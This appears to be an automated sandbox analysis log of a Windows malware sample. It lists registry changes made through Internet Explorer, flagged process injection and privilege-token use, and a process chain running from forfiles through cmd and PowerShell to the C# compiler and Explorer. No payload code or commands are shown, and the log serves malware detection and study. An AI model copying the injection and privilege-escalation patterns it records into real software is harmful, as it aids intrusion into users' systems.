Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000b5c2719d4402ce19a3c4d452d5fccb19a0b03547e8feee6c5e6129a97e614e0e000000000e80000000020000200000008369f785becf77e598de1a37e13b4a4a80e4dd5b637d255b6161812a43cc5edbc00000008a77f1996ea9713fe2ed530c7f5b4b79c54661a7c0227c7a164aee7345f67141fe052f15ad9f88d41df43afb8cdc708ee48036454d6d6a0295b83481df3413b34854e222f07af81c67a43ea9bc0da339dd2073755ab497a5c6768d23005dbf0971126f2d2d181cd637d7515d292b9d231f1e6a8c19260ed987db803da22cad8fc688aefa1cc4a4c0cf70fe540e8957e0b8aa37c6bda198fa111c85882cec9dc72ca66bd889b112d7e0e9ff4ae91cfd51752c6895f70c4554fa169bb9daf47c594000000072819e8bbcc6d8ef74d9597b96483136d18805911ec89797187e437e6d11cc2c151cde2cd7451f30a3b2ff7ab0e0600261950c8b4a317f23917d456d19251d40 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000278caae0289e07c01b55643235c1d17beaeb3ab3d647899a701ab368f4fc55ab000000000e8000000002000020000000a2d3534366cce6f8672509bfba1f9ee9bb14e88b07634f095528a360edd2612dc00000008d6a839b7fed1b295b23e575b9e43709cc50b29730c23502934b041d3f0946aaa37da38ed0f6b71acb6ddb16bfe42924bc0ac0702e43506a8ff1434f7e2b02cd22f49a27be4a9c303a4c00efe8ada9f1c75e7bb72c813656732c80f6f94e906822985cedfcc87c54baeb716905f8530d3b26575d820289fb111ae5af2950d07dc6623d543a1402cfa9e161f33705e5363643c0641ffa37192bf42358bcbde66ddd36be45da10ac558162b36dade161bd836faea5b27848929e8d053527fefc3e40000000452d3778d033f935497627f85519250b739e3a85435e414fb8538d98edda21a3da3c4534abd687529c3a5dd292af78a1f5b10d4400c838f131716b41734ad03b C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000ac16fa4d7d749c6f48b04e600045e586211c10e1eca22ca1b650425eecca04fc000000000e8000000002000020000000e33b3848fc714c4fb81104080bd3ee81c47c5a3f497a07237c4bb002fab3503ec0000000a5bf5b1bb138dfc8ce49df2e6c991c9e46e040c75336613ce72e89028f96324422b2f554a510a4348743f6d1bad51cf2b93640c7a97dc15546d04cc246701b97f1c65f5f6d9f01ac905ef077ac45a6df1d5d37544e0bfba5c4c0cc245866d56769b5f9c34ad61e9680dedaaa9b49ea6dea9bc9ef6e5950751907f56f955e47f6ca96ebc2fee851ce653cf4a265e2d0eec1c9c493e238fdd943f41547a330a973773f3012d039dbaa374bf03162ee6968e1179c6a85c81c867ed14a7ba6ba67f7400000007e57deb9f29453c88a9283b3e04d28b16caf07d880eba55796e51ff87d7eed0884d7b25591377c6942b589ef05ec2572fc0064af9f02415b4e5b9559ae9538d1 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000f072e04571f3a79c520911520eda0a6f2eac768d3496d11a29edaf9ea778c5f2000000000e8000000002000020000000cc84e32e32b8a586558e2a24efa5663ef8eddea3ca0a20961a89a533bc255b67c00000005b8197e1023d200f6ab6d4ee2de49c43ac550f5b7795c9f88a0965ce17599d42b51359fff60ba64f611537cafff3fc9e511c5ecd0d083f249b072a507c394659a778408f5425b48680f2b30eb098b0422761d69c0e8f7e4eb11ae213810868615986237ef3f2a432d876e6ca29fca03c53f6f24acf630edf8c1d3531c9d0de8282d5d5b9532158fe8218c560b7f189c220f308abc88b7b6ebc9b001d29ea241f4942223dfdea14d9ff90b97c864223d85566b40d99db10609a54c1a50f2a75954000000038ea2a2eb3ef1dad0ce43ebd65013c0205f4bf7460384b94ce80aa29081456dc2bccd49e320f211e40243e8d35f3735b8df4a83c9f507fed0739c48eae67781a C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1239828497" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b6000000000200000000001066000000010000200000008c42e6b8d457f5146390167162fcb60a41c4124eca3d36bdd84895ecbcb3cd12000000000e800000000200002000000013aedbf5bc9a85450522fe2a856a6dfaf17178ef821b4d0eeea8db5b5923550cc0000000ba925dd49375f5faa0a1a1ed43192204126520210c0db80429727f713fc85dc0adcce282aeed8428a6a99382b9b0cabb2ccc3cc3f1027c365b3c52237ac78bac0bc2feff9681075858f641e0fb2b9c99f6b83eaade5aca23947113c90cb6f01f108e344b76e65b43c849eba7742d402d3a178621bb6f5172d880f6d404faa0adfa754bb163315e3ccfc7b121844e16e2c5d479b96a114e4a649d20d94441f9a0549f76ec8cd4cc42d0c96c4ee4cf9eae2e76dc35a1ca30d7058c563c7c0673bd4000000073fb1a99705aa73a5d36293a947463e2f96caf2c89f43ec0cf1050c25f02653bf31ea82f2c9422f6738bb5de443de1b71887507408b7e32e0830edd14a460803 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000097e9b3339d74b1b2a27394b9c04c68d9810549ea073ce400c1f26a70e483e573000000000e8000000002000020000000409ff2d119d14706fc8fc056cb00bfa9e02b1bdd8a1517571630130ea5bdfb0cc00000008b4dcc2d11885473e4f49787e893a372e9c7a4abf0e9c60613f666ce0aab891313301ba40607038fbba24b47e5422318c999ed6e71640f4c135eef439210882f49c0e410c69da73b824ce8081cd663d4eddcc1a0c0aa412bb0836b84a32928512e62433bf3a7bc398acdd570439456027212457de566fd1a437185dfd36076058884f88aca112a2c9796d31a06625045d478e22ecab29e7a7297d2d9011c210670361c61ad7db5fc7750f4ef655fac1c15cb064b7d71a9d3c98ff1cd2c149bcb4000000019ffb369db768ad67f79d3810f72a208f396cfd95cc76c895eca24eaf9da917edcfce43a8f03e4fb76479bb65dcf0dc16b06643c3ae51f1c030a7252e26c565d C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000054d062f3fc9ff1baad305cb2483c891eea0c033264892af6f7b4adb7cabebb38000000000e80000000020000200000002c34af920b5c2c27426d6a5f91ecc3e8e20d4051c2198130ae646919cf191c4ac00000003d6f6e2f7af086329acbd80e0631058a102a1d732fa052523a1cc6b6a0ff0f561ee100620bcb99625692b02d7076630ec5ea8cbcef3ca75a0d3794ec3e5079903f275c76f74199131d67313f46b2f1b33e36c4707e96644a4a13132388b087c2afc505ce5d9e2f3e32378816a99b2915f274ed30544eb676a1c3496becd10aba5ad7c80358b89b2ec68a1a686a39330ef6febaeef4ecb94aa105e765d187e14b76e65fa6fcc8ff97a2be6106663db051ca55a9cb4f1b8084548b8169c2b92f1a40000000712a405b1189c567029dd21d216a4a304ce24d79c090e94b6ceb639bfc6da4e8f25763b45e74209fe1871997b754f88e1aa5978903a769a70682d1bd9bcc0236 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947454" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 1928 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2092 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2580 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2720 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4816 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4300 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 5008 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 636 wrote to memory of 1596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 636 wrote to memory of 1596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1596 wrote to memory of 3624 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1596 wrote to memory of 3624 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 3624 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4644 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4644 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 2752 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 2752 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 4192 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 4192 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4192 wrote to memory of 4280 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4192 wrote to memory of 4280 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 3124 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 3124 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3124 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3124 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 444 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe C:\Windows\Explorer.EXE
PID 1276 wrote to memory of 2996 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe

"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82950 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82954 /prefetch:2

